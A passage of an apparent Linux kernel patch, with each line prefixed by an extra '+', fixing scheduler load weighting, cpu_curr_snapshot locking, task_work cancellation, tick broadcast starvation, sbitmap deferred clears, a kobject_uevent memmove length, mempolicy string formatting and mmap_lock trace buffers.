+index 6f48f565e3acb..456c956f481ef 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -1531,6 +1531,16 @@ static void rcu_tasks_trace_pregp_step(struct list_head *hop)
+ 	// allow safe access to the hop list.
+ 	for_each_online_cpu(cpu) {
+ 		rcu_read_lock();
++		// Note that cpu_curr_snapshot() picks up the target
++		// CPU's current task while its runqueue is locked with
++		// an smp_mb__after_spinlock().  This ensures that either
++		// the grace-period kthread will see that task's read-side
++		// critical section or the task will see the updater's pre-GP
++		// accesses.  The trailing smp_mb() in cpu_curr_snapshot()
++		// does not currently play a role other than simplify
++		// that function's ordering semantics.  If these simplified
++		// ordering semantics continue to be redundant, that smp_mb()
++		// might be removed.
+ 		t = cpu_curr_snapshot(cpu);
+ 		if (rcu_tasks_trace_pertask_prep(t, true))
+ 			trc_add_holdout(t, hop);
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index cac41c49bd2f5..4a96bf1d2f37c 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -1259,27 +1259,24 @@ int tg_nop(struct task_group *tg, void *data)
+ static void set_load_weight(struct task_struct *p, bool update_load)
+ {
+ 	int prio = p->static_prio - MAX_RT_PRIO;
+-	struct load_weight *load = &p->se.load;
++	struct load_weight lw;
+ 
+-	/*
+-	 * SCHED_IDLE tasks get minimal weight:
+-	 */
+ 	if (task_has_idle_policy(p)) {
+-		load->weight = scale_load(WEIGHT_IDLEPRIO);
+-		load->inv_weight = WMULT_IDLEPRIO;
+-		return;
++		lw.weight = scale_load(WEIGHT_IDLEPRIO);
++		lw.inv_weight = WMULT_IDLEPRIO;
++	} else {
++		lw.weight = scale_load(sched_prio_to_weight[prio]);
++		lw.inv_weight = sched_prio_to_wmult[prio];
+ 	}
+ 
+ 	/*
+ 	 * SCHED_OTHER tasks have to update their load when changing their
+ 	 * weight
+ 	 */
+-	if (update_load && p->sched_class == &fair_sched_class) {
+-		reweight_task(p, prio);
+-	} else {
+-		load->weight = scale_load(sched_prio_to_weight[prio]);
+-		load->inv_weight = sched_prio_to_wmult[prio];
+-	}
++	if (update_load && p->sched_class == &fair_sched_class)
++		reweight_task(p, &lw);
++	else
++		p->se.load = lw;
+ }
+ 
+ #ifdef CONFIG_UCLAMP_TASK
+@@ -4318,12 +4315,7 @@ int task_call_func(struct task_struct *p, task_call_f func, void *arg)
+  * @cpu: The CPU on which to snapshot the task.
+  *
+  * Returns the task_struct pointer of the task "currently" running on
+- * the specified CPU.  If the same task is running on that CPU throughout,
+- * the return value will be a pointer to that task's task_struct structure.
+- * If the CPU did any context switches even vaguely concurrently with the
+- * execution of this function, the return value will be a pointer to the
+- * task_struct structure of a randomly chosen task that was running on
+- * that CPU somewhere around the time that this function was executing.
++ * the specified CPU.
+  *
+  * If the specified CPU was offline, the return value is whatever it
+  * is, perhaps a pointer to the task_struct structure of that CPU's idle
+@@ -4337,11 +4329,16 @@ int task_call_func(struct task_struct *p, task_call_f func, void *arg)
+  */
+ struct task_struct *cpu_curr_snapshot(int cpu)
+ {
++	struct rq *rq = cpu_rq(cpu);
+ 	struct task_struct *t;
++	struct rq_flags rf;
+ 
+-	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	rq_lock_irqsave(rq, &rf);
++	smp_mb__after_spinlock(); /* Pairing determined by caller's synchronization design. */
+ 	t = rcu_dereference(cpu_curr(cpu));
++	rq_unlock_irqrestore(rq, &rf);
+ 	smp_mb(); /* Pairing determined by caller's synchronization design. */
++
+ 	return t;
+ }
+ 
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index d0851610cf467..1e12f731a0337 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -3330,15 +3330,14 @@ static void reweight_entity(struct cfs_rq *cfs_rq, struct sched_entity *se,
+ 
+ }
+ 
+-void reweight_task(struct task_struct *p, int prio)
++void reweight_task(struct task_struct *p, const struct load_weight *lw)
+ {
+ 	struct sched_entity *se = &p->se;
+ 	struct cfs_rq *cfs_rq = cfs_rq_of(se);
+ 	struct load_weight *load = &se->load;
+-	unsigned long weight = scale_load(sched_prio_to_weight[prio]);
+ 
+-	reweight_entity(cfs_rq, se, weight);
+-	load->inv_weight = sched_prio_to_wmult[prio];
++	reweight_entity(cfs_rq, se, lw->weight);
++	load->inv_weight = lw->inv_weight;
+ }
+ 
+ static inline int throttled_hierarchy(struct cfs_rq *cfs_rq);
+@@ -8525,7 +8524,7 @@ static int detach_tasks(struct lb_env *env)
+ 		case migrate_util:
+ 			util = task_util_est(p);
+ 
+-			if (util > env->imbalance)
++			if (shr_bound(util, env->sd->nr_balance_failed) > env->imbalance)
+ 				goto next;
+ 
+ 			env->imbalance -= util;
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index 81d9698f0a1eb..f0c3d0d4a0dd5 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -2346,7 +2346,7 @@ extern void init_sched_dl_class(void);
+ extern void init_sched_rt_class(void);
+ extern void init_sched_fair_class(void);
+ 
+-extern void reweight_task(struct task_struct *p, int prio);
++extern void reweight_task(struct task_struct *p, const struct load_weight *lw);
+ 
+ extern void resched_curr(struct rq *rq);
+ extern void resched_cpu(int cpu);
+diff --git a/kernel/signal.c b/kernel/signal.c
+index 5d45f5da2b36e..4bebd2443cc3a 100644
+--- a/kernel/signal.c
++++ b/kernel/signal.c
+@@ -2558,6 +2558,14 @@ static void do_freezer_trap(void)
+ 	spin_unlock_irq(&current->sighand->siglock);
+ 	cgroup_enter_frozen();
+ 	schedule();
++
++	/*
++	 * We could've been woken by task_work, run it to clear
++	 * TIF_NOTIFY_SIGNAL. The caller will retry if necessary.
++	 */
++	clear_notify_signal();
++	if (unlikely(task_work_pending(current)))
++		task_work_run();
+ }
+ 
+ static int ptrace_signal(int signr, kernel_siginfo_t *info, enum pid_type type)
+diff --git a/kernel/task_work.c b/kernel/task_work.c
+index 065e1ef8fc8d7..ffba54734cdb4 100644
+--- a/kernel/task_work.c
++++ b/kernel/task_work.c
+@@ -119,9 +119,9 @@ static bool task_work_func_match(struct callback_head *cb, void *data)
+ }
+ 
+ /**
+- * task_work_cancel - cancel a pending work added by task_work_add()
+- * @task: the task which should execute the work
+- * @func: identifies the work to remove
++ * task_work_cancel_func - cancel a pending work matching a function added by task_work_add()
++ * @task: the task which should execute the func's work
++ * @func: identifies the func to match with a work to remove
+  *
+  * Find the last queued pending work with ->func == @func and remove
+  * it from queue.
+@@ -130,11 +130,35 @@ static bool task_work_func_match(struct callback_head *cb, void *data)
+  * The found work or NULL if not found.
+  */
+ struct callback_head *
+-task_work_cancel(struct task_struct *task, task_work_func_t func)
++task_work_cancel_func(struct task_struct *task, task_work_func_t func)
+ {
+ 	return task_work_cancel_match(task, task_work_func_match, func);
+ }
+ 
++static bool task_work_match(struct callback_head *cb, void *data)
++{
++	return cb == data;
++}
++
++/**
++ * task_work_cancel - cancel a pending work added by task_work_add()
++ * @task: the task which should execute the work
++ * @cb: the callback to remove if queued
++ *
++ * Remove a callback from a task's queue if queued.
++ *
++ * RETURNS:
++ * True if the callback was queued and got cancelled, false otherwise.
++ */
++bool task_work_cancel(struct task_struct *task, struct callback_head *cb)
++{
++	struct callback_head *ret;
++
++	ret = task_work_cancel_match(task, task_work_match, cb);
++
++	return ret == cb;
++}
++
+ /**
+  * task_work_run - execute the works added by task_work_add()
+  *
+@@ -167,7 +191,7 @@ void task_work_run(void)
+ 		if (!work)
+ 			break;
+ 		/*
+-		 * Synchronize with task_work_cancel(). It can not remove
++		 * Synchronize with task_work_cancel_match(). It can not remove
+ 		 * the first entry == work, cmpxchg(task_works) must fail.
+ 		 * But it can remove another entry from the ->next list.
+ 		 */
+diff --git a/kernel/time/tick-broadcast.c b/kernel/time/tick-broadcast.c
+index 0916cc9adb828..ba551ec546f52 100644
+--- a/kernel/time/tick-broadcast.c
++++ b/kernel/time/tick-broadcast.c
+@@ -1137,6 +1137,7 @@ void tick_broadcast_switch_to_oneshot(void)
+ #ifdef CONFIG_HOTPLUG_CPU
+ void hotplug_cpu__broadcast_tick_pull(int deadcpu)
+ {
++	struct tick_device *td = this_cpu_ptr(&tick_cpu_device);
+ 	struct clock_event_device *bc;
+ 	unsigned long flags;
+ 
+@@ -1144,6 +1145,28 @@ void hotplug_cpu__broadcast_tick_pull(int deadcpu)
+ 	bc = tick_broadcast_device.evtdev;
+ 
+ 	if (bc && broadcast_needs_cpu(bc, deadcpu)) {
++		/*
++		 * If the broadcast force bit of the current CPU is set,
++		 * then the current CPU has not yet reprogrammed the local
++		 * timer device to avoid a ping-pong race. See
++		 * ___tick_broadcast_oneshot_control().
++		 *
++		 * If the broadcast device is hrtimer based then
++		 * programming the broadcast event below does not have any
++		 * effect because the local clockevent device is not
++		 * running and not programmed because the broadcast event
++		 * is not earlier than the pending event of the local clock
++		 * event device. As a consequence all CPUs waiting for a
++		 * broadcast event are stuck forever.
++		 *
++		 * Detect this condition and reprogram the cpu local timer
++		 * device to avoid the starvation.
++		 */
++		if (tick_check_broadcast_expired()) {
++			cpumask_clear_cpu(smp_processor_id(), tick_broadcast_force_mask);
++			tick_program_event(td->evtdev->next_event, 1);
++		}
++
+ 		/* This moves the broadcast assignment to this CPU: */
+ 		clockevents_program_event(bc, bc->next_event, 1);
+ 	}
+diff --git a/kernel/trace/pid_list.c b/kernel/trace/pid_list.c
+index 95106d02b32d8..85de221c0b6f2 100644
+--- a/kernel/trace/pid_list.c
++++ b/kernel/trace/pid_list.c
+@@ -354,7 +354,7 @@ static void pid_list_refill_irq(struct irq_work *iwork)
+ 	while (upper_count-- > 0) {
+ 		union upper_chunk *chunk;
+ 
+-		chunk = kzalloc(sizeof(*chunk), GFP_KERNEL);
++		chunk = kzalloc(sizeof(*chunk), GFP_NOWAIT);
+ 		if (!chunk)
+ 			break;
+ 		*upper_next = chunk;
+@@ -365,7 +365,7 @@ static void pid_list_refill_irq(struct irq_work *iwork)
+ 	while (lower_count-- > 0) {
+ 		union lower_chunk *chunk;
+ 
+-		chunk = kzalloc(sizeof(*chunk), GFP_KERNEL);
++		chunk = kzalloc(sizeof(*chunk), GFP_NOWAIT);
+ 		if (!chunk)
+ 			break;
+ 		*lower_next = chunk;
+diff --git a/kernel/watchdog_hld.c b/kernel/watchdog_hld.c
+index 1e8a49dc956e2..8ba4b269ab89c 100644
+--- a/kernel/watchdog_hld.c
++++ b/kernel/watchdog_hld.c
+@@ -91,11 +91,15 @@ static bool watchdog_check_timestamp(void)
+ 	__this_cpu_write(last_timestamp, now);
+ 	return true;
+ }
+-#else
+-static inline bool watchdog_check_timestamp(void)
++
++static void watchdog_init_timestamp(void)
+ {
+-	return true;
++	__this_cpu_write(nmi_rearmed, 0);
++	__this_cpu_write(last_timestamp, ktime_get_mono_fast_ns());
+ }
++#else
++static inline bool watchdog_check_timestamp(void) { return true; }
++static inline void watchdog_init_timestamp(void) { }
+ #endif
+ 
+ static struct perf_event_attr wd_hw_attr = {
+@@ -196,6 +200,7 @@ void hardlockup_detector_perf_enable(void)
+ 	if (!atomic_fetch_inc(&watchdog_cpus))
+ 		pr_info("Enabled. Permanently consumes one hw-PMU counter.\n");
+ 
++	watchdog_init_timestamp();
+ 	perf_event_enable(this_cpu_read(watchdog_ev));
+ }
+ 
+diff --git a/lib/decompress_bunzip2.c b/lib/decompress_bunzip2.c
+index 3518e7394eca8..ca736166f1000 100644
+--- a/lib/decompress_bunzip2.c
++++ b/lib/decompress_bunzip2.c
+@@ -232,7 +232,8 @@ static int INIT get_next_block(struct bunzip_data *bd)
+ 	   RUNB) */
+ 	symCount = symTotal+2;
+ 	for (j = 0; j < groupCount; j++) {
+-		unsigned char length[MAX_SYMBOLS], temp[MAX_HUFCODE_BITS+1];
++		unsigned char length[MAX_SYMBOLS];
++		unsigned short temp[MAX_HUFCODE_BITS+1];
+ 		int	minLen,	maxLen, pp;
+ 		/* Read Huffman code lengths for each symbol.  They're
+ 		   stored in a way similar to mtf; record a starting
+diff --git a/lib/kobject_uevent.c b/lib/kobject_uevent.c
+index 7c44b7ae4c5c3..d397b1ad5ccf0 100644
+--- a/lib/kobject_uevent.c
++++ b/lib/kobject_uevent.c
+@@ -432,8 +432,23 @@ static void zap_modalias_env(struct kobj_uevent_env *env)
+ 		len = strlen(env->envp[i]) + 1;
+ 
+ 		if (i != env->envp_idx - 1) {
++			/* @env->envp[] contains pointers to @env->buf[]
++			 * with @env->buflen chars, and we are removing
++			 * variable MODALIAS here pointed by @env->envp[i]
++			 * with length @len as shown below:
++			 *
++			 * 0               @env->buf[]      @env->buflen
++			 * ---------------------------------------------
++			 * ^             ^              ^              ^
++			 * |             |->   @len   <-| target block |
++			 * @env->envp[0] @env->envp[i]  @env->envp[i + 1]
++			 *
++			 * so the "target block" indicated above is moved
++			 * backward by @len, and its right size is
++			 * @env->buflen - (@env->envp[i + 1] - @env->envp[0]).
++			 */
+ 			memmove(env->envp[i], env->envp[i + 1],
+-				env->buflen - len);
++				env->buflen - (env->envp[i + 1] - env->envp[0]));
+ 
+ 			for (j = i; j < env->envp_idx - 1; j++)
+ 				env->envp[j] = env->envp[j + 1] - len;
+diff --git a/lib/objagg.c b/lib/objagg.c
+index 1e248629ed643..1608895b009c8 100644
+--- a/lib/objagg.c
++++ b/lib/objagg.c
+@@ -167,6 +167,9 @@ static int objagg_obj_parent_assign(struct objagg *objagg,
+ {
+ 	void *delta_priv;
+ 
++	if (WARN_ON(!objagg_obj_is_root(parent)))
++		return -EINVAL;
++
+ 	delta_priv = objagg->ops->delta_create(objagg->priv, parent->obj,
+ 					       objagg_obj->obj);
+ 	if (IS_ERR(delta_priv))
+@@ -903,20 +906,6 @@ static const struct objagg_opt_algo *objagg_opt_algos[] = {
+ 	[OBJAGG_OPT_ALGO_SIMPLE_GREEDY] = &objagg_opt_simple_greedy,
+ };
+ 
+-static int objagg_hints_obj_cmp(struct rhashtable_compare_arg *arg,
+-				const void *obj)
+-{
+-	struct rhashtable *ht = arg->ht;
+-	struct objagg_hints *objagg_hints =
+-			container_of(ht, struct objagg_hints, node_ht);
+-	const struct objagg_ops *ops = objagg_hints->ops;
+-	const char *ptr = obj;
+-
+-	ptr += ht->p.key_offset;
+-	return ops->hints_obj_cmp ? ops->hints_obj_cmp(ptr, arg->key) :
+-				    memcmp(ptr, arg->key, ht->p.key_len);
+-}
+-
+ /**
+  * objagg_hints_get - obtains hints instance
+  * @objagg:		objagg instance
+@@ -955,7 +944,6 @@ struct objagg_hints *objagg_hints_get(struct objagg *objagg,
+ 				offsetof(struct objagg_hints_node, obj);
+ 	objagg_hints->ht_params.head_offset =
+ 				offsetof(struct objagg_hints_node, ht_node);
+-	objagg_hints->ht_params.obj_cmpfn = objagg_hints_obj_cmp;
+ 
+ 	err = rhashtable_init(&objagg_hints->node_ht, &objagg_hints->ht_params);
+ 	if (err)
+diff --git a/lib/sbitmap.c b/lib/sbitmap.c
+index c515072eca296..61075535a8073 100644
+--- a/lib/sbitmap.c
++++ b/lib/sbitmap.c
+@@ -60,12 +60,30 @@ static inline void update_alloc_hint_after_get(struct sbitmap *sb,
+ /*
+  * See if we have deferred clears that we can batch move
+  */
+-static inline bool sbitmap_deferred_clear(struct sbitmap_word *map)
++static inline bool sbitmap_deferred_clear(struct sbitmap_word *map,
++		unsigned int depth, unsigned int alloc_hint, bool wrap)
+ {
+-	unsigned long mask;
++	unsigned long mask, word_mask;
+ 
+-	if (!READ_ONCE(map->cleared))
+-		return false;
++	guard(spinlock_irqsave)(&map->swap_lock);
++
++	if (!map->cleared) {
++		if (depth == 0)
++			return false;
++
++		word_mask = (~0UL) >> (BITS_PER_LONG - depth);
++		/*
++		 * The current behavior is to always retry after moving
++		 * ->cleared to word, and we change it to retry in case
++		 * of any free bits. To avoid an infinite loop, we need
++		 * to take wrap & alloc_hint into account, otherwise a
++		 * soft lockup may occur.
++		 */
++		if (!wrap && alloc_hint)
++			word_mask &= ~((1UL << alloc_hint) - 1);
++
++		return (READ_ONCE(map->word) & word_mask) != word_mask;
++	}
+ 
+ 	/*
+ 	 * First get a stable cleared mask, setting the old mask to 0.
+@@ -85,6 +103,7 @@ int sbitmap_init_node(struct sbitmap *sb, unsigned int depth, int shift,
+ 		      bool alloc_hint)
+ {
+ 	unsigned int bits_per_word;
++	int i;
+ 
+ 	if (shift < 0)
+ 		shift = sbitmap_calculate_shift(depth);
+@@ -116,6 +135,9 @@ int sbitmap_init_node(struct sbitmap *sb, unsigned int depth, int shift,
+ 		return -ENOMEM;
+ 	}
+ 
++	for (i = 0; i < sb->map_nr; i++)
++		spin_lock_init(&sb->map[i].swap_lock);
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(sbitmap_init_node);
+@@ -126,7 +148,7 @@ void sbitmap_resize(struct sbitmap *sb, unsigned int depth)
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < sb->map_nr; i++)
+-		sbitmap_deferred_clear(&sb->map[i]);
++		sbitmap_deferred_clear(&sb->map[i], 0, 0, 0);
+ 
+ 	sb->depth = depth;
+ 	sb->map_nr = DIV_ROUND_UP(sb->depth, bits_per_word);
+@@ -167,18 +189,19 @@ static int __sbitmap_get_word(unsigned long *word, unsigned long depth,
+ 	return nr;
+ }
+ 
+-static int sbitmap_find_bit_in_index(struct sbitmap *sb, int index,
+-				     unsigned int alloc_hint)
++static int sbitmap_find_bit_in_word(struct sbitmap_word *map,
++				    unsigned int depth,
++				    unsigned int alloc_hint,
++				    bool wrap)
+ {
+-	struct sbitmap_word *map = &sb->map[index];
+ 	int nr;
+ 
+ 	do {
+-		nr = __sbitmap_get_word(&map->word, __map_depth(sb, index),
+-					alloc_hint, !sb->round_robin);
++		nr = __sbitmap_get_word(&map->word, depth,
++					alloc_hint, wrap);
+ 		if (nr != -1)
+ 			break;
+-		if (!sbitmap_deferred_clear(map))
++		if (!sbitmap_deferred_clear(map, depth, alloc_hint, wrap))
+ 			break;
+ 	} while (1);
+ 
+@@ -203,7 +226,9 @@ static int __sbitmap_get(struct sbitmap *sb, unsigned int alloc_hint)
+ 		alloc_hint = 0;
+ 
+ 	for (i = 0; i < sb->map_nr; i++) {
+-		nr = sbitmap_find_bit_in_index(sb, index, alloc_hint);
++		nr = sbitmap_find_bit_in_word(&sb->map[index],
++					      __map_depth(sb, index),
++					      alloc_hint, !sb->round_robin);
+ 		if (nr != -1) {
+ 			nr += index << sb->shift;
+ 			break;
+@@ -243,30 +268,24 @@ static int __sbitmap_get_shallow(struct sbitmap *sb,
+ 	int nr = -1;
+ 
+ 	index = SB_NR_TO_INDEX(sb, alloc_hint);
++	alloc_hint = SB_NR_TO_BIT(sb, alloc_hint);
+ 
+ 	for (i = 0; i < sb->map_nr; i++) {
+-again:
+-		nr = __sbitmap_get_word(&sb->map[index].word,
+-					min_t(unsigned int,
+-					      __map_depth(sb, index),
+-					      shallow_depth),
+-					SB_NR_TO_BIT(sb, alloc_hint), true);
++		nr = sbitmap_find_bit_in_word(&sb->map[index],
++					      min_t(unsigned int,
++						    __map_depth(sb, index),
++						    shallow_depth),
++					      alloc_hint, true);
++
+ 		if (nr != -1) {
+ 			nr += index << sb->shift;
+ 			break;
+ 		}
+ 
+-		if (sbitmap_deferred_clear(&sb->map[index]))
+-			goto again;
+-
+ 		/* Jump to next index. */
+-		index++;
+-		alloc_hint = index << sb->shift;
+-
+-		if (index >= sb->map_nr) {
++		alloc_hint = 0;
++		if (++index >= sb->map_nr)
+ 			index = 0;
+-			alloc_hint = 0;
+-		}
+ 	}
+ 
+ 	return nr;
+@@ -506,18 +525,18 @@ unsigned long __sbitmap_queue_get_batch(struct sbitmap_queue *sbq, int nr_tags,
+ 		struct sbitmap_word *map = &sb->map[index];
+ 		unsigned long get_mask;
+ 		unsigned int map_depth = __map_depth(sb, index);
++		unsigned long val;
+ 
+-		sbitmap_deferred_clear(map);
+-		if (map->word == (1UL << (map_depth - 1)) - 1)
++		sbitmap_deferred_clear(map, 0, 0, 0);
++		val = READ_ONCE(map->word);
++		if (val == (1UL << (map_depth - 1)) - 1)
+ 			goto next;
+ 
+-		nr = find_first_zero_bit(&map->word, map_depth);
++		nr = find_first_zero_bit(&val, map_depth);
+ 		if (nr + nr_tags <= map_depth) {
+ 			atomic_long_t *ptr = (atomic_long_t *) &map->word;
+-			unsigned long val;
+ 
+ 			get_mask = ((1UL << nr_tags) - 1) << nr;
+-			val = READ_ONCE(map->word);
+ 			while (!atomic_long_try_cmpxchg(ptr, &val,
+ 							  get_mask | val))
+ 				;
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 87a14638fad09..05b8797163b2b 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -4353,7 +4353,7 @@ void __init hugetlb_add_hstate(unsigned int order)
+ 	BUG_ON(hugetlb_max_hstate >= HUGE_MAX_HSTATE);
+ 	BUG_ON(order == 0);
+ 	h = &hstates[hugetlb_max_hstate++];
+-	mutex_init(&h->resize_lock);
++	__mutex_init(&h->resize_lock, "resize mutex", &h->resize_key);
+ 	h->order = order;
+ 	h->mask = ~(huge_page_size(h) - 1);
+ 	for (i = 0; i < MAX_NUMNODES; ++i)
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index 84e11c2caae42..399d8cb488138 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -3112,8 +3112,9 @@ int mpol_parse_str(char *str, struct mempolicy **mpol)
+  * @pol:  pointer to mempolicy to be formatted
+  *
+  * Convert @pol into a string.  If @buffer is too short, truncate the string.
+- * Recommend a @maxlen of at least 32 for the longest mode, "interleave", the
+- * longest flag, "relative", and to display at least a few node ids.
++ * Recommend a @maxlen of at least 51 for the longest mode, "weighted
++ * interleave", plus the longest flag flags, "relative|balancing", and to
++ * display at least a few node ids.
+  */
+ void mpol_to_str(char *buffer, int maxlen, struct mempolicy *pol)
+ {
+@@ -3122,7 +3123,10 @@ void mpol_to_str(char *buffer, int maxlen, struct mempolicy *pol)
+ 	unsigned short mode = MPOL_DEFAULT;
+ 	unsigned short flags = 0;
+ 
+-	if (pol && pol != &default_policy && !(pol->flags & MPOL_F_MORON)) {
++	if (pol &&
++	    pol != &default_policy &&
++	    !(pol >= &preferred_node_policy[0] &&
++	      pol <= &preferred_node_policy[ARRAY_SIZE(preferred_node_policy) - 1])) {
+ 		mode = pol->mode;
+ 		flags = pol->flags;
+ 	}
+@@ -3149,12 +3153,18 @@ void mpol_to_str(char *buffer, int maxlen, struct mempolicy *pol)
+ 		p += snprintf(p, buffer + maxlen - p, "=");
+ 
+ 		/*
+-		 * Currently, the only defined flags are mutually exclusive
++		 * Static and relative are mutually exclusive.
+ 		 */
+ 		if (flags & MPOL_F_STATIC_NODES)
+ 			p += snprintf(p, buffer + maxlen - p, "static");
+ 		else if (flags & MPOL_F_RELATIVE_NODES)
+ 			p += snprintf(p, buffer + maxlen - p, "relative");
++
++		if (flags & MPOL_F_NUMA_BALANCING) {
++			if (!is_power_of_2(flags & MPOL_MODE_FLAGS))
++				p += snprintf(p, buffer + maxlen - p, "|");
++			p += snprintf(p, buffer + maxlen - p, "balancing");
++		}
+ 	}
+ 
+ 	if (!nodes_empty(nodes))
+diff --git a/mm/mmap_lock.c b/mm/mmap_lock.c
+index 1854850b4b897..368b840e75082 100644
+--- a/mm/mmap_lock.c
++++ b/mm/mmap_lock.c
+@@ -19,14 +19,7 @@ EXPORT_TRACEPOINT_SYMBOL(mmap_lock_released);
+ 
+ #ifdef CONFIG_MEMCG
+ 
+-/*
+- * Our various events all share the same buffer (because we don't want or need
+- * to allocate a set of buffers *per event type*), so we need to protect against
+- * concurrent _reg() and _unreg() calls, and count how many _reg() calls have
+- * been made.
+- */
+-static DEFINE_MUTEX(reg_lock);
+-static int reg_refcount; /* Protected by reg_lock. */
++static atomic_t reg_refcount;
+ 
+ /*
+  * Size of the buffer for memcg path names. Ignoring stack trace support,
+@@ -34,136 +27,22 @@ static int reg_refcount; /* Protected by reg_lock. */
+  */
+ #define MEMCG_PATH_BUF_SIZE MAX_FILTER_STR_VAL
+ 
+-/*
+- * How many contexts our trace events might be called in: normal, softirq, irq,
+- * and NMI.
+- */
+-#define CONTEXT_COUNT 4
+-
+-struct memcg_path {
+-	local_lock_t lock;
+-	char __rcu *buf;
+-	local_t buf_idx;
+-};
+-static DEFINE_PER_CPU(struct memcg_path, memcg_paths) = {
+-	.lock = INIT_LOCAL_LOCK(lock),
+-	.buf_idx = LOCAL_INIT(0),
+-};
+-
+-static char **tmp_bufs;
+-
+-/* Called with reg_lock held. */
+-static void free_memcg_path_bufs(void)
+-{
+-	struct memcg_path *memcg_path;
+-	int cpu;
+-	char **old = tmp_bufs;
+-
+-	for_each_possible_cpu(cpu) {
+-		memcg_path = per_cpu_ptr(&memcg_paths, cpu);
+-		*(old++) = rcu_dereference_protected(memcg_path->buf,
+-			lockdep_is_held(&reg_lock));
+-		rcu_assign_pointer(memcg_path->buf, NULL);
+-	}
+-
+-	/* Wait for inflight memcg_path_buf users to finish. */
+-	synchronize_rcu();
+-
+-	old = tmp_bufs;
+-	for_each_possible_cpu(cpu) {
+-		kfree(*(old++));
+-	}
+-
+-	kfree(tmp_bufs);
+-	tmp_bufs = NULL;
+-}
+-
+ int trace_mmap_lock_reg(void)
+ {
+-	int cpu;
+-	char *new;
+-
+-	mutex_lock(&reg_lock);
+-
+-	/* If the refcount is going 0->1, proceed with allocating buffers. */
+-	if (reg_refcount++)
+-		goto out;
+-
+-	tmp_bufs = kmalloc_array(num_possible_cpus(), sizeof(*tmp_bufs),
+-				 GFP_KERNEL);
+-	if (tmp_bufs == NULL)
+-		goto out_fail;
+-
+-	for_each_possible_cpu(cpu) {
+-		new = kmalloc(MEMCG_PATH_BUF_SIZE * CONTEXT_COUNT, GFP_KERNEL);
+-		if (new == NULL)
+-			goto out_fail_free;
+-		rcu_assign_pointer(per_cpu_ptr(&memcg_paths, cpu)->buf, new);
+-		/* Don't need to wait for inflights, they'd have gotten NULL. */
+-	}
+-
+-out:
+-	mutex_unlock(&reg_lock);
++	atomic_inc(&reg_refcount);
+ 	return 0;
+-
+-out_fail_free:
+-	free_memcg_path_bufs();
+-out_fail:
+-	/* Since we failed, undo the earlier ref increment. */
+-	--reg_refcount;
+-
+-	mutex_unlock(&reg_lock);
+-	return -ENOMEM;
+ }
+ 
+ void trace_mmap_lock_unreg(void)
+ {
+-	mutex_lock(&reg_lock);
+-
+-	/* If the refcount is going 1->0, proceed with freeing buffers. */
+-	if (--reg_refcount)
+-		goto out;
+-
+-	free_memcg_path_bufs();
+-
+-out:
+-	mutex_unlock(&reg_lock);
+-}
+-
+-static inline char *get_memcg_path_buf(void)
+-{
+-	struct memcg_path *memcg_path = this_cpu_ptr(&memcg_paths);
+-	char *buf;
+-	int idx;
+-
+-	rcu_read_lock();
+-	buf = rcu_dereference(memcg_path->buf);
+-	if (buf == NULL) {
+-		rcu_read_unlock();
+-		return NULL;
+-	}
+-	idx = local_add_return(MEMCG_PATH_BUF_SIZE, &memcg_path->buf_idx) -
+-	      MEMCG_PATH_BUF_SIZE;
+-	return &buf[idx];
++	atomic_dec(&reg_refcount);
+ }
+ 
+-static inline void put_memcg_path_buf(void)
+-{
+-	local_sub(MEMCG_PATH_BUF_SIZE, &this_cpu_ptr(&memcg_paths)->buf_idx);
+-	rcu_read_unlock();
+-}
+-
+-#define TRACE_MMAP_LOCK_EVENT(type, mm, ...)                                   \
+-	do {                                                                   \
+-		const char *memcg_path;                                        \
+-		local_lock(&memcg_paths.lock);                                 \
+-		memcg_path = get_mm_memcg_path(mm);                            \
+-		trace_mmap_lock_##type(mm,                                     \
+-				       memcg_path != NULL ? memcg_path : "",   \
+-				       ##__VA_ARGS__);                         \
+-		if (likely(memcg_path != NULL))                                \
+-			put_memcg_path_buf();                                  \
+-		local_unlock(&memcg_paths.lock);                               \
++#define TRACE_MMAP_LOCK_EVENT(type, mm, ...)                    \
++	do {                                                    \
++		char buf[MEMCG_PATH_BUF_SIZE];                  \
++		get_mm_memcg_path(mm, buf, sizeof(buf));        \
++		trace_mmap_lock_##type(mm, buf, ##__VA_ARGS__); \
+ 	} while (0)
+ 
+ #else /* !CONFIG_MEMCG */
+@@ -185,37 +64,23 @@ void trace_mmap_lock_unreg(void)
+ #ifdef CONFIG_TRACING
+ #ifdef CONFIG_MEMCG
+ /*
+- * Write the given mm_struct's memcg path to a percpu buffer, and return a
+- * pointer to it. If the path cannot be determined, or no buffer was available
+- * (because the trace event is being unregistered), NULL is returned.
+- *
+- * Note: buffers are allocated per-cpu to avoid locking, so preemption must be
+- * disabled by the caller before calling us, and re-enabled only after the
+- * caller is done with the pointer.
+- *
+- * The caller must call put_memcg_path_buf() once the buffer is no longer
+- * needed. This must be done while preemption is still disabled.
++ * Write the given mm_struct's memcg path to a buffer. If the path cannot be
++ * determined or the trace event is being unregistered, empty string is written.
+  */
+-static const char *get_mm_memcg_path(struct mm_struct *mm)
++static void get_mm_memcg_path(struct mm_struct *mm, char *buf, size_t buflen)
+ {
+-	char *buf = NULL;
+-	struct mem_cgroup *memcg = get_mem_cgroup_from_mm(mm);
++	struct mem_cgroup *memcg;
+ 
++	buf[0] = '\0';
++	/* No need to get path if no trace event is registered. */
++	if (!atomic_read(&reg_refcount))
++		return;
++	memcg = get_mem_cgroup_from_mm(mm);
+ 	if (memcg == NULL)
+-		goto out;
+-	if (unlikely(memcg->css.cgroup == NULL))
+-		goto out_put;
+-
+-	buf = get_memcg_path_buf();
+-	if (buf == NULL)
+-		goto out_put;
+-
+-	cgroup_path(memcg->css.cgroup, buf, MEMCG_PATH_BUF_SIZE);
+-
+-out_put:
